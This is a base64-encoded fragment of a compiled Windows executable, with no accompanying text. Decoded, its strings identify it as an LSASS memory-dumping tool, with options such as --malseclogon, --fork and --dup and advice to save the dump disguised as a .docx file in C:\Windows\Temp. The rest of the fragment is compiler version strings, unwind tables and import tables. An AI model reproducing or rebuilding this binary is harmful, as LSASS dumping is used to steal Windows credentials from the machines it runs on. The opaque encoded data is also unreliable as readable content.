WgALS1oZWxwAGludmFsaWQgYXJndW1lbnQ6ICVzAElmIE1hbFNlY0xvZ29uIGlzIGJlaW5nIHVzZWQgbG9jYWxseSwgeW91IG5lZWQgdG8gcHJvdmlkZSB0aGUgZnVsbCBwYXRoOiAlcwAAAAAAVGhlIG9wdGlvbnMgLS1mb3JrIGFuZCAtLXNuYXBzaG90IGNhbm5vdCBiZSB1c2VkIGF0IHRoZSBzYW1lIHRpbWUATFNBU1MgUElEOiAlbGQAAAAAAAAAAFlvdSBtdXN0IHByb3ZpZGUgdGhlIGR1bXAgZmlsZTogLS13cml0ZSBDOlxXaW5kb3dzXFRlbXBcZG9jLmRvY3gAAAAAAAAAAElmIC0tZHVwIGFuZCAtLW1hbHNlY2xvZ29uIGFyZSB1c2VkLCB5b3UgbmVlZCB0byBwcm92aWRlIGEgYmluYXJ5IHdpdGggLS1iaW5hcnkAVGhlIG9wdGlvbiAtLWJpbmFyeSBjYW4gb25seSBiZSB1c2VkIHdpdGggLS1tYWxzZWNsb2dvbiBhbmQgLS1kdXAAAAAAAAAAAAAAAAAAAABQkQBAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAUABAAAACKABQAEAAADsbwFAAQAAADiQAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVbmtub3duIGVycm9yAAAAQXJndW1lbnQgZG9tYWluIGVycm9yIChET01BSU4pAABPdmVyZmxvdyByYW5nZSBlcnJvciAoT1ZFUkZMT1cpAFBhcnRpYWwgbG9zcyBvZiBzaWduaWZpY2FuY2UgKFBMT1NTKQAAAABUb3RhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoVExPU1MpAAAAAAAAVGhlIHJlc3VsdCBpcyB0b28gc21hbGwgdG8gYmUgcmVwcmVzZW50ZWQgKFVOREVSRkxPVykAQXJndW1lbnQgc2luZ3VsYXJpdHkgKFNJR04pAAAAAAAAAF9tYXRoZXJyKCk6ICVzIGluICVzKCVnLCAlZykgIChyZXR2YWw9JWcpCgAAeHT//yx0///Ec///THT//1x0//9sdP//PHT//01pbmd3LXc2NCBydW50aW1lIGZhaWx1cmU6CgAAAAAAQWRkcmVzcyAlcCBoYXMgbm8gaW1hZ2Utc2VjdGlvbgAgIFZpcnR1YWxRdWVyeSBmYWlsZWQgZm9yICVkIGJ5dGVzIGF0IGFkZHJlc3MgJXAAAAAAAAAAACAgVmlydHVhbFByb3RlY3QgZmFpbGVkIHdpdGggY29kZSAweCV4AAAgIFVua25vd24gcHNldWRvIHJlbG9jYXRpb24gcHJvdG9jb2wgdmVyc2lvbiAlZC4KAAAAAAAAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBiaXQgc2l6ZSAlZC4KAAAAAAAAACVkIGJpdCBwc2V1ZG8gcmVsb2NhdGlvbiBhdCAlcCBvdXQgb2YgcmFuZ2UsIHRhcmdldGluZyAlcCwgeWllbGRpbmcgdGhlIHZhbHVlICVwLgoAAAAAAACgef//oHn//6B5//+gef//oHn//wh5//+gef//0Hn//wh5//8zef//AAAAAAAAAAAobnVsbCkAACgAbgB1AGwAbAApAAAATmFOAEluZgAAAF6k//+Inf//iJ3//3ik//+Inf//gKP//4id//+Xo///iJ3//4id//8MpP//SKT//4id//+aof//s6H//4id///Pof//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//+yh//+Inf//oKL//4id///Yov//EKP//0ij//+Inf//VaD//4id//+Inf//RaH//4id//+Inf//iJ3//4id//+Inf//iJ3//9uk//+Inf//iJ3//4id//+Inf//AJ7//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//gp///4id////nv//eJ7//32g///VoP//DaH//7Wg//94nv//YJ7//4id//9cof//fKH//0Sf//8Anv//FaD//4id//+Inf//057//2Ce//8Anv//iJ3//4id//8Anv//iJ3//2Ce//8AAAAASW5maW5pdHkATmFOADAAAAAAAAAAAPg/YUNvY6eH0j+zyGCLKIrGP/t5n1ATRNM/BPp9nRYtlDwyWkdVE0TTPwAAAAAAAPA/AAAAAAAAJEAAAAAAAAAIQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAADgPwAAAAAAAAAAAAAAAAAAAAAAA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gQDAVAAAAEEAgUEAwFQAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQsEJQsDBkICMAFQAQsERQsDBoICMAFQAQgDBQhSBAMBUAAAAQgDBQjSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQiSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQhyBAMBUAAAAQgDBQjSBAMBUAAAAQsENQsDBmICMAFQAQgDBQgSBAMBUAAAAQgDBQhyBAMBUAAAAQsERQsDBoICMAFQAQgDBQhyBAMBUAAAAQsEBQsBFAAEAwFQAQgDBQjyBAMBUAAAAQgDBQiSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQjSBAMBUAAAAQgDBQiyBAMBUAAAAQgDBQhyBAMBUAAAAQgDBQhyBAMBUAAAARAEhRADCAFyAAFQAQAAAAEIAwUIkgQDAVAAAAEIAwUIEgQDAVAAAAERBeURAwkBHQACMAFQAAABCAMFCFIEAwFQAAABCAMFCFIEAwFQAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQsERQsDBoICMAFQAREFhREDCQERAAIwAVAAAAEIAwUIUgQDAVAAAAEIAwUIkgQDAVAAAAEIAwUIUgQDAVAAAAEQBIUQAwgBiAABUAEIAwUIMgQDAVAAAAEIAwUIUgQDAVAAAAEIAwUIUgQDAVAAAAEIAwUIkgQDAVAAAAEQBIUQAwgBpgABUAEIAwUIcgQDAVAAAAEIAwUIUgQDAVAAAAEIAwUIUgQDAVAAAAEIAwUIUgQDAVAAAAEIAwUI0gQDAVAAAAELBDULAwZiAjABUAEIAwUIsgQDAVAAAAELBAULARwABAMBUAERBYURAwkBOwACcAFQAAABCAMFCBIEAwFQAAABCwQFCwEUAAQDAVABCwR1CwMG4gIwAVABCAMFCFIEAwFQAAABCAMFCFIEAwFQAAABC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XIAggVTbGVlcAClBVRsc0dldFZhbHVlANQFVmlydHVhbFByb3RlY3QAANYFVmlydHVhbFF1ZXJ5AAALBldpZGVDaGFyVG9NdWx0aUJ5dGUAOABfX0Nfc3BlY2lmaWNfaGFuZGxlcgAAQABfX19sY19jb2RlcGFnZV9mdW5jAEMAX19fbWJfY3VyX21heF9mdW5jAABSAF9fZ2V0bWFpbmFyZ3MAUwBfX2luaXRlbnYAVABfX2lvYl9mdW5jAABhAF9fc2V0X2FwcF90eXBlAABjAF9fc2V0dXNlcm1hdGhlcnIAAHIAX2FjbWRsbgB5AF9hbXNnX2V4aXQAAIsAX2NleGl0AACXAF9jb21tb2RlAAC+AF9lcnJubwAA3ABfZm1vZGUAABsBX2luaXR0ZXJtAIEBX2xvY2sAJwJfb25leGl0ALICX3RpbWU2NADHAl91bmxvY2sACANfd2NzaWNtcAAAhQNhYm9ydACSA2F0b2kAAJYDY2FsbG9jAACjA2V4aXQAALcDZnByaW50ZgC5A2ZwdXRjAL4DZnJlZQAAywNmd3JpdGUAAPQDbG9jYWxlY29udgAA+gNtYWxsb2MAAP0DbWJzdG93Y3MAAAEEbWVtY21wAAACBG1lbWNweQAABARtZW1zZXQAABYEcmFuZAAAIgRzaWduYWwAACsEc3JhbmQANwRzdHJlcnJvcgAAOQRzdHJsZW4AADwEc3RybmNtcAA9BHN0cm5jcHkAQARzdHJyY2hyAEEEc3Ryc3BuAABeBHZmcHJpbnRmAAB4BHdjc2xlbgAAeQR3Y3NuY2F0AHwEd2NzbmNweQCDBHdjc3N0cgAAAAAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAEtFUk5FTDMyLmRsbAAAAAAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQBtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM